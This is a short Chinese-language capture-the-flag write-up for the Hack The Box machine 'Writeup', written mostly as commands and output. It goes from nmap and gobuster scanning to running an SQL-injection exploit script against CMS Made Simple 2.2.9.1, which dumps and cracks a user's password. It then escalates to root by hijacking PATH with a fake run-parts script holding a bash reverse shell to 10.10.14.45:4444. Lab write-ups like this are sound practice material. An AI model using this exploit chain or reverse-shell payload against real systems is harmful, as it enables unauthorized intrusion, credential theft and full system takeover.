nmap 10.129.165.11 -sV -sC -Pn > nmap.txt
gobuster dir  -u http://10.129.165.11/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php  > gobuster.txt


1.nmap掃描發現80端口,提示不可暴力嘗試,否則會被ban,發現有writeup/路徑
2.訪問write路徑後發現是CMS Made Simple服務
3.訪問主頁後找到下面地址,可以看到doc/README.txt
http://svn.cmsmadesimple.org/svn/cmsmadesimple/trunk
4.查看doc/README.txt發現版本號Version 2.2.9.1
5.執行SQLI腳本
python 46635.py --url http://10.129.165.11/writeup/
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
6.使用帳號密碼ssh登入服務器
7.使用pspy64發現有定時任務,沒有指定系統完整路徑,可以hijack
run-parts --list /etc/dhcp/dhclient-exit-hooks.d
8.查看run-parts路徑是在/bin下面
whereis run-parts                                                                                      │
/bin/run-parts /usr/share/man/man8/run-parts.8.gz
9.查看系統變量echo $PATH,發現/usr/local/bin 在/bin之前,並且我們有/usr/local/bin的權限
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
10.在/usr/local/bin下面創建run-parts放入以下code 取得root reverse shell
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.45/4444 0>&1
11.在/usr/local/bin下創建run-parts腳本
12.ssh登入後會執行run-parts
